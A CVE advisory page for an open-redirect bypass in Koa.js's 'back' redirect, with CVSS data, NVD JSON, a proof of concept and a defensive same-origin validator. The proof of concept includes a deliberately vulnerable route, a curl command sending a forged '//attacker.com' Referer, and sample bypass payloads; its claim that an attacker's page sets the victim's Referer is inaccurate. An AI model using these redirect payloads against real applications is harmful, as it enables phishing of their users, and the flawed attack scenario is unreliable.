Security Vulnerability Report
CVE-2025-62595 CVSS 4.3 MEDIUM

CVE-2025-62595

Published: 2025-10-21 17:15:41
Last Modified: 2026-01-20 14:45:48

Description

Koa is expressive middleware for Node.js using ES2017 async functions. In versions 2.16.2 to before 2.16.3 and 3.0.1 to before 3.0.3, a bypass to CVE-2025-8129 was discovered in the Koa.js framework affecting its back redirect functionality. In certain circumstances, an attacker can manipulate the Referer header to force a user’s browser to navigate to an external, potentially malicious website. This occurs because the implementation incorrectly treats some specially crafted URLs as safe relative paths. Exploiting this vulnerability could allow attackers to perform phishing, social engineering, or other redirect-based attacks on users of affected applications. This issue has been patched in version 3.0.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:koajs:koa:2.16.2:*:*:*:*:node.js:*:* - VULNERABLE
Koa.js >= 2.16.2, < 2.16.3
Koa.js >= 3.0.1, < 3.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// PoC for CVE-2025-62595 - Koa.js Open Redirect via Referer Header
// This PoC demonstrates how to bypass the back redirect protection
const Koa = require('koa');
const app = new Koa();

// Vulnerable route that uses ctx.redirect('back')
app.use(async (ctx) => {
  if (ctx.path === '/login') {
    // After login attempt, redirect back to the referer
    ctx.redirect('back');
  } else {
    ctx.body = 'Click the link below to test:\n\n<a href="/login">Login (redirects back)</a>';
  }
});

app.listen(3000, () => {
  console.log('Vulnerable Koa.js server running on http://localhost:3000');
});

/*
 * Attack scenario:
 *
 * 1. Attacker creates a malicious page at https://attacker.com/phish
 * 2. The malicious page contains a link like:
 *    <a href="http://victim-koa-app.com/login">Click here for free gift!</a>
 *
 * 3. However, the attacker sets the Referer header to a malicious URL:
 *    Using protocol-relative URL bypass: Referer: //attacker.com/phish
 *
 * 4. When victim clicks the link, browser sends request with Referer header
 *    containing the attacker's URL
 *
 * 5. Koa.js processes ctx.redirect('back') and incorrectly treats
 *    "//attacker.com/phish" as a safe relative path
 *
 * 6. Browser interprets "//attacker.com/phish" as an absolute URL
 *    and redirects the victim to attacker's phishing page
 *
 * Exploit using curl:
 * curl -v -H "Referer: //attacker.com/phishing" http://victim-app.com/login
 *
 * Expected response: 302 Found with Location: //attacker.com/phishing
 * Browser will redirect to: https://attacker.com/phishing
 */
```
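The root cause above is a Referer that looks like a relative path but resolves to another host. The following is an added defensive example (not Koa's own code and not the fix shipped in 3.0.3): it resolves the Referer with the WHATWG URL parser against the application's own origin and only redirects to the path when the origins match. The origin `https://app.example`, the sample Referer values, and the `safeBackTarget`/`safeBackRedirect` names are assumptions for the example.

```javascript
// Added example (not Koa's own code): same-origin validation for a "back"
// redirect. Rather than assuming a Referer that starts with "/" is a relative
// path, resolve it with the WHATWG URL parser against the site's own origin
// and keep only the path when the resolved origin matches.

// Returns a same-origin target (path + query + fragment) derived from
// `referer`, or `fallback` when the header is missing, unparsable, or
// resolves to any other origin (or to a non-http scheme).
function safeBackTarget(referer, siteOrigin, fallback = '/') {
  if (!referer) return fallback;
  let url;
  try {
    // Resolution turns "//evil.example/x" into "https://evil.example/x", and
    // "/\evil.example/x" (backslash is a slash for http(s) URLs) likewise,
    // so both protocol-relative shapes fail the origin check below.
    url = new URL(referer, siteOrigin);
  } catch {
    return fallback;
  }
  if (url.origin !== new URL(siteOrigin).origin) return fallback;
  return url.pathname + url.search + url.hash;
}

// Koa-style middleware factory (assumed shape: ctx.get() and ctx.redirect()
// are Koa's own APIs). Drop-in replacement for ctx.redirect('back').
function safeBackRedirect(siteOrigin, fallback = '/') {
  return (ctx) => ctx.redirect(safeBackTarget(ctx.get('Referer'), siteOrigin, fallback));
}

// Constructed Referer values covering the bypass shapes the advisory describes.
const SITE_ORIGIN = 'https://app.example';          // assumed deployment origin
const SAMPLE_REFERERS = [
  '/dashboard?tab=1',                // ordinary relative path: kept
  'https://app.example/account#x',   // absolute, same origin: path kept
  '//attacker.example/phish',        // protocol-relative bypass: rejected
  '/\\attacker.example/phish',       // backslash variant: rejected
  'https://attacker.example/phish',  // absolute external URL: rejected
  'javascript:alert(1)',             // non-http scheme: rejected
  '',                                // header absent: fallback
];
// Runs every sample through the validator; returns { referer: target }.
function evaluateSamples(origin = SITE_ORIGIN) {
  const out = {};
  for (const r of SAMPLE_REFERERS) out[r] = safeBackTarget(r, origin);
  return out;
}
for (const [r, t] of Object.entries(evaluateSamples())) {
  console.log(`${JSON.stringify(r).padEnd(36)} -> ${t}`);
}
```

Comparing the resolved `origin` rather than inspecting leading characters is what makes this robust: any new spelling of "looks relative, resolves remote" still lands on a foreign origin and is replaced by the fallback.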

References

https://github.com/koajs/koa/commit/769fd75cc6b30d72493b370b5a3ae2332ca03c5b (Patch)
https://github.com/koajs/koa/security/advisories/GHSA-g8mr-fgfg-5qpc (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62595", "sourceIdentifier": "[email protected]", "published": "2025-10-21T17:15:40.737", "lastModified": "2026-01-20T14:45:48.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Koa is expressive middleware for Node.js using ES2017 async functions. In versions 2.16.2 to before 2.16.3 and 3.0.1 to before 3.0.3, a bypass to CVE-2025-8129 was discovered in the Koa.js framework affecting its back redirect functionality. In certain circumstances, an attacker can manipulate the Referer header to force a user’s browser to navigate to an external, potentially malicious website. This occurs because the implementation incorrectly treats some specially crafted URLs as safe relative paths. Exploiting this vulnerability could allow attackers to perform phishing, social engineering, or other redirect-based attacks on users of affected applications. This issue has been patched in version 3.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", 
"description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "3.0.1", "versionEndExcluding": "3.0.3", "matchCriteriaId": "4A627ED5-2951-46B1-BFF3-E633EE820936"}, {"vulnerable": true, "criteria": "cpe:2.3:a:koajs:koa:2.16.2:*:*:*:*:node.js:*:*", "matchCriteriaId": "23C668B2-3773-49E0-9274-7C8824F59CB0"}]}]}], "references": [{"url": "https://github.com/koajs/koa/commit/769fd75cc6b30d72493b370b5a3ae2332ca03c5b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/koajs/koa/security/advisories/GHSA-g8mr-fgfg-5qpc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/koajs/koa/security/advisories/GHSA-g8mr-fgfg-5qpc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}